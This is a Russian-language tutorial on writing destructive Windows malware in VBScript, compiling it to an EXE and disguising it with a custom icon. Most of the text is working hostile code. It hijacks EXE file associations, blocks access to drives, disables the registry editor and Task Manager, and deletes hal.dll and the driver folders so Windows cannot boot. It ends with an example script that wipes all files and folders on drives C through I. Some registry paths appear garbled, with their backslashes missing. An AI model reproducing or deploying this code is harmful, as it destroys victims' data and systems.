Короче, не важно новичок ты или умелый хакер, важно то, что нужно это
тебе или нет? Вредоносная программа будет написана на языке visual
basic script. Затем скомпелирована в "exe" формат. Приступим.
Для начала,нужно уметь изменять расширение файла, с этого и
начнём. Существует много способов, но мне нравится этот. У каждого
должен быть обычный архиватор, вот им мы и воспользуемся. И так,
создайте к примеру текстовый файл под названием "Текстовый документ".
Теперь найдите этот текстовик через свой архиватор. В архиваторе,
вы должны увидеть следующее: "Текстовый документ.txt". Окончание "txt"
- имя расширения файла,вот его и нужно изменить,точно так же, словно,
редактируете имя папки или файла,стираете строчку "txt" и ставите
скажем "mp3". В результате мы получаем "Текстовый
документ.mp3" формата. Если всё понятно, а вопросов возникнуть по
этому поводу недолжно,то пойдём дальше. Создайте текстовый
документ,содержащий следующее:
on error resume next
Set S =
CreateObject("Wscript.Shell")
set
FSO=createobject("scripting.filesystemobject")
s.run"rundll32
user32, SwapMouseButton"
Затем, сохранив полученные данные, вам
нужно изменить расширение файла, и вместо "txt" прописать "vbs".
Аббревиатура "vbs", происходит от названия языка
программирования - "visual basic script".
Вот у нас и готова
первая, простая, вредоносная программка, меняющая местами кнопки мыши.
Теперь нужно её скомпелировать (изменить) в "exe" формат с
помощью программы: "Vbs2Exe",
и установить любой значок с
помощью грабера иконок: "IconToy".
А теперь информация для
тех, кто не намерен ограничивать свои возможности банальным обменом
кнопок мыши.
on error resume next
Set S =
CreateObject("Wscript.Shell")
set
FSO=createobject("scripting.filesystemobject")
Три, верхние строчки
- должны присутствовать всегда. Далее,
следует кодировка, а ниже, в
скобках - пояснение.
Так же возможно сочетать, те или иные
вредоносные команды:
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
(Запрет на
открытие "EXE" файлов)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicro
softWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
(запрет доступа к жёстким дискам)
fso.deletefile
fso.getspecialfolder(0)+"system32hal.dll",1
(удаляется системный
фаил, после чего загрузка Windows становится невозможна. Система
работает до первой перезагрузки)
fso.deletefolder
fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder
fso.getspecialfolder(0)+"Driver Cache"
(удаление драйверов)
fso.deletefolder "АДРЕС",1
(Удаление папки. Пример:
fso.deletefolder "C:Новая папка",1)
fso.deletefolder "C:*.*",1
(Удаление всех папок диска С. Адрес можно поставить любой)
fso.deletefile "АДРЕС",1
(Удаление файла. Пример: fso.deletefile
"C:Новая папкаТекстовый документ.txt",1)
fso.deletefile "C:*.*",1
(Удаление всех файлов диска С. Адрес можно поставить любой)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD"
(Запрет редактирования реестра)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
(Запрет диспетчера задач)
s.run"rundll32 user32,
SwapMouseButton"
(Обмен кнопок мыши)
Пример:
on
error resume next
Set S = CreateObject("Wscript.Shell")
set
FSO=createobject("scripting.filesystemobject")
fso.deletefile
"C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile
fso.getspecialfolder(0)+"system32hal.dll",1